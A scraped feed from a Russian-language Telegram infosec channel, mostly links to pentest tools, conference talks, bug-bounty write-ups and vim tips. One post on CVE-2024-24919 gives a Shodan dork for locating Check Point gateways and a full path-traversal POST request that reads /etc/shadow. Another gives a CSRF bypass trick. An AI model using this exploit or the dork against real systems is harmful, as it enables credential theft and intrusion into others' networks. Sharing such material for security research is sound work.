Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.93K photos
103 videos
166 files
2.94K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.me/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🔍 Вы знаете, что сбор поддоменов — ключевая часть в разведке цели. Тут, как говорится, чем больше, тем лучше.

Ловите инструмент regulator, который использует регулярные выражения для обнаружения DNS. Можно использовать вместе с подобным инструментом altdns, а можно отдельно.

👉 GitHub

#recon #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
🎤 Кстати, на этой странице доступны все доклады с киберфестиваля 2024 Positive Hack Days. Если не присутствовали, то обязательно к просмотру!

👀 Смотреть
Please open Telegram to view this post
VIEW IN TELEGRAM
👾2
📌 Подробная шпаргалка по поиску и эксплуатации SQL-инъекций, которая должна быть в ваших закладках.

👉 Перейти к шпаргалке

#cheatsheet
👍7🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
👩‍💻 Удалите строки, соответствующие вашему шаблону, с помощью команды g в #vim:

:g/pattern/d — удалить строки, соответствующие шаблону
:g!/pattern/d — удалить строки, не соответствующие шаблону

👉 Подробнее

#tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4
💡Простой способ обхода CSRF для проверки того, отправляет ли ваша цель данные в JSON-формате без anti-CSRF токена

Измените тип контента с application/json на text/plain и посмотрите, принимает ли он по-прежнему запрос 🥷

#bugbounty #tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3
🥷 Пентест gRPC: гайд для этичного хакера

Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.

👉 Читать

#pentest #bugbounty
💸📊 На сколько просели зарплаты в ИТ в 2024 году?

Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.

🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.

👉 Остальные данные — в статье
👉 Зеркало
This media is not supported in your browser
VIEW IN TELEGRAM
👩‍💻 Попробуйте эти два варианта для улучшения поиска в #vim:

set ignorecase — игнорирует регистр
set smartcase — поиск со смешанным регистром

#tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
🥷 Изучение необычных методов атаки на NTLM relay

Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:

1️⃣ Enumerating Domain Usernames via a Non-Admin SMB Relay
2️⃣ Relaying to Microsoft SQL Server
3️⃣ Relaying to LDAP and Configuring Resource-Based Delegation
4️⃣ Shadow Credentials Attack with no Prior Credentials
5️⃣ Shadow Credentials Attack Using Prior Credentials

#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Все пишут про CVE-2024-24919, и мы напишем.

🔍 Дорк для Shodan: title:"Check Point" ssl:"target"

Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
🐳✈️ Docker ушёл из РФ! Инструкция по восстановлению доступа к Docker Hub для пользователей из России

Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.

🔗 Читать статью
🔗 Зеркало
🥱72👍1😁1😢1
This media is not supported in your browser
VIEW IN TELEGRAM
👩‍💻 Полезный способ получить лучшее представление о коде, окружающем текущую строку в #vim:

zt — измените положение области просмотра так, чтобы текущая строка находилась вверху
zzпосередине
zbвнизу

👉 Подробнее
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from Библиотека программиста | программирование, кодинг, разработка
💻 8 причин участвовать в хакатонах

Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!

👉 Читать статью
👉 Зеркало

📌 Другие материалы по теме:

💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
2👍2🔥1
🔥 Упрощение поиска и эксплуатации уязвимостей HTTP desync с помощью TRACE

Исследователь из PortSwigger рассматривает новую технику эксплуатации, которую можно использовать для полной компрометации веб-приложения с помощью TRACE — древнего метода HTTP, который поддерживается более широко, чем вы думаете. 

👉 Читать

#bugbounty #pentest #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
This media is not supported in your browser
VIEW IN TELEGRAM
#vim позволяет использовать любой разделитель регулярных выражений при замене шаблона.

Нет необходимости использовать /, попробуйте вместо этого #:


:s#/usr/local/bin#/usr/sbin#g


Это позволяет избежать экранирования символа /.

#tips
🔥5👍4
🤖 Web Apps: APIs’ Nightmare — доклад исследователя и пентестера Paulo Silva, посвященный трансформации веб-приложений. Автор проведет вас по пути от традиционной архитектуры к современным парадигмам.

Вы узнаете, как:

☑️ Традиционные приложения полагались на отдельные файлы, получаемые с помощью HTTP-запросов, в то время как современные объединяют код в пакеты и используют API для создания динамического контента.
☑️ Мобильные приложения, IoT и веб-приложения взаимодействуют через API.

Кроме того, вы получите представление о 10 основных рисках безопасности API OWASP + ценные ресурсы для безопасной разработки API.

📺 Смотреть

#pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🥱1
💵203 000 за 4 уязвимости в боте Azure Health

Обзор двух RCE, path traversal и memory leak от канала Bug Bounty Reports Explained. Кратко, ёмко и по делу👇

👀 Смотреть

#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6